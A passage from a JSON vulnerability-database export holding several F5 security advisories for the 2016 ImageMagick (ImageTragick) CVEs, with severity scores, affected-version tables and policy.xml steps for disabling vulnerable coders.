team\nApril, 28 2016 - code execution vulnerability in ImageMagick was found\nby Nikolay Ermishkin from Mail.Ru Security Team while researching\noriginal report\nApril, 30 2016 - code execution vulnerability reported to ImageMagick\ndevelopment team\nApril, 30 2016 - code execution vulnerability fixed by ImageMagick\n(incomplete fix)\nApril, 30 2016 - fixed ImageMagic version 6.9.3-9 published (incomplete fix)\nMay, 1 2016 - ImageMagic informed of the fix bypass\nMay, 2 2016 - limited disclosure to 'distros' mailing list\nMay, 3 2016 - public disclosure at https://imagetragick.com/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2021-06-08T18:49:07", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol61974123\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, if the **HTTP** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"HTTP\" /&gt; \n \nSince the vulnerable coders listed in CVE-2016-3718 are HTTP and FTP, the modified **policymap** stanza should look similar to the following example:\n\n&lt;policymap&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"HTTP\" /&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"FTP\" /&gt; \n&lt;/policymap&gt;\n\n 5. Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL03151140: ImageMagick vulnerability CVE-2016-3714\n * SOL10550253: ImageMagick vulnerability CVE-2016-3715\n * SOL25102203: ImageMagick vulnerability CVE-2016-3716\n * SOL29154575: ImageMagick vulnerability CVE-2016-3717\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-13T00:00:00", "type": "f5", "title": "SOL61974123 - ImageMagick vulnerability CVE-2016-3718", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-09-02T00:00:00", "id": "SOL61974123", "href": "http://support.f5.com/kb/en-us/solutions/public/k/61/sol61974123.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-08-16T21:24:15", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol03151140\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, if the **HTTPS** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" /&gt;\n\nSince the vulnerable coders listed in CVE-2016-3714 are EPHEMERAL, HTTPS, MVG, MSL, TEXT, SHOW, WIN, and PLT, the modified **policymap** stanza should look similar to the following example:\n\n&lt;policymap&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" /&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" /&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" /&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" /&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"TEXT\" /&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"SHOW\" /&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"WIN\" /&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"PLT\" /&gt; \n&lt;/policymap&gt;\n\n 5. Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL10550253: ImageMagick vulnerability CVE-2016-3715\n * SOL25102203: ImageMagick vulnerability CVE-2016-3716\n * SOL29154575: ImageMagick vulnerability CVE-2016-3717\n * SOL61974123: ImageMagick vulnerability CVE-2016-3718\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-09T00:00:00", "type": "f5", "title": "SOL03151140 - ImageMagick vulnerability CVE-2016-3714", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-08-16T00:00:00", "id": "SOL03151140", "href": "http://support.f5.com/kb/en-us/solutions/public/k/03/sol03151140.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:49:07", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol10550253\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, since the vulnerable coders listed in CVE-2016-3715 is EPHEMERAL, the modified **policymap** stanza should look similar to the following example: \n\n&lt;policymap&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" /&gt; \n&lt;/policymap&gt;\n\n 5. Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL03151140: ImageMagick vulnerability CVE-2016-3714\n * SOL25102203: ImageMagick vulnerability CVE-2016-3716\n * SOL29154575: ImageMagick vulnerability CVE-2016-3717\n * SOL61974123: ImageMagick vulnerability CVE-2016-3718\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-13T00:00:00", "type": "f5", "title": "SOL10550253 - ImageMagick vulnerability CVE-2016-3715", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-09-02T00:00:00", "id": "SOL10550253", "href": "http://support.f5.com/kb/en-us/solutions/public/k/10/sol10550253.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:49:07", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.SOL25102203\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, the vulnerable coders listed in CVE-2016-3716 is MSL, the modified **policymap** stanza should look similar to the following example: \n\n&lt;policymap&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" /&gt; \n&lt;/policymap&gt;\n\n 5. Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL03151140: ImageMagick vulnerability CVE-2016-3714\n * SOL10550253: ImageMagick vulnerability CVE-2016-3715\n * SOL29154575: ImageMagick vulnerability CVE-2016-3717\n * SOL61974123: ImageMagick vulnerability CVE-2016-3718\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide\n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-13T00:00:00", "type": "f5", "title": "SOL25102203 - ImageMagick vulnerability CVE-2016-3716", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-09-02T00:00:00", "id": "SOL25102203", "href": "http://support.f5.com/kb/en-us/solutions/public/k/25/sol25102203.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:49:07", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol29154575\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, if the **LABEL** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"LABEL\" /&gt;\n\nSince the vulnerable coder listed in CVE-2016-3717 is LABEL, the modified **policymap** stanza should look similar to the following example:\n\n&lt;policymap&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"LABEL\" /&gt; \n&lt;/policymap&gt;\n\n 5. Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL03151140: ImageMagick vulnerability CVE-2016-3714\n * SOL10550253: ImageMagick vulnerability CVE-2016-3715\n * SOL25102203: ImageMagick vulnerability CVE-2016-3716\n * SOL61974123: ImageMagick vulnerability CVE-2016-3718\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-13T00:00:00", "type": "f5", "title": "SOL29154575 - ImageMagick vulnerability CVE-2016-3717", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-09-02T00:00:00", "id": "SOL29154575", "href": "http://support.f5.com/kb/en-us/solutions/public/k/29/sol29154575.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-20T21:07:35", "description": "\nF5 Product Development has assigned ID 591908 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H29154575 on the **Diagnostics** &gt; **Identified** &gt; **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.1 | Not vulnerable | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP GTM | None | 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Low | ImageMagick \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ ADC | 4.5.0 | None | Low | ImageMagick \nBIG-IQ Centralized Management | 5.0.0 \n4.6.0 | None | Low | ImageMagick \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | ImageMagick \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol29154575\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, if the **LABEL** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"LABEL\" /&gt;\n\nSince the vulnerable coder listed in CVE-2016-3717 is LABEL, the modified **policymap** stanza should look similar to the following example:\n\n&lt;policymap&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"LABEL\" /&gt; \n&lt;/policymap&gt;\n\n 5. Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K03151140: ImageMagick vulnerability CVE-2016-3714](<https://support.f5.com/csp/article/K03151140>)\n * [K10550253: ImageMagick vulnerability CVE-2016-3715](<https://support.f5.com/csp/article/K10550253>)\n * [K25102203: ImageMagick vulnerability CVE-2016-3716](<https://support.f5.com/csp/article/K25102203>)\n * [K61974123: ImageMagick vulnerability CVE-2016-3718](<https://support.f5.com/csp/article/K61974123>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-14T02:43:00", "type": "f5", "title": "ImageMagick vulnerability CVE-2016-3717", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2017-08-24T00:50:00", "id": "F5:K29154575", "href": "https://support.f5.com/csp/article/K29154575", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-08T02:18:16", "description": "\nF5 Product Development has assigned ID 591806 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H592135 on the** Diagnostics** &gt;** Identified** &gt; **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2| Severe| WebAcceleration profile configured with Image Optimization \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0| 11.2.1 HF16 \n10.1.0 - 10.2.4| Severe| WebAcceleration profile configured with Image Optimization \nBIG-IP GTM| None| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0| 11.2.1 HF16 \n10.1.0 - 10.2.4| Severe| WebAcceleration profile configured with Image Optimization \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1| None| Low| ImageMagick \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| ImageMagick \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| ImageMagick \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| ImageMagick \nBIG-IQ ADC| 4.5.0| None| Low| ImageMagick \nBIG-IQ Centralized Management| 5.0.0 \n4.6.0| None| Low| ImageMagick \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Low| ImageMagick \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be 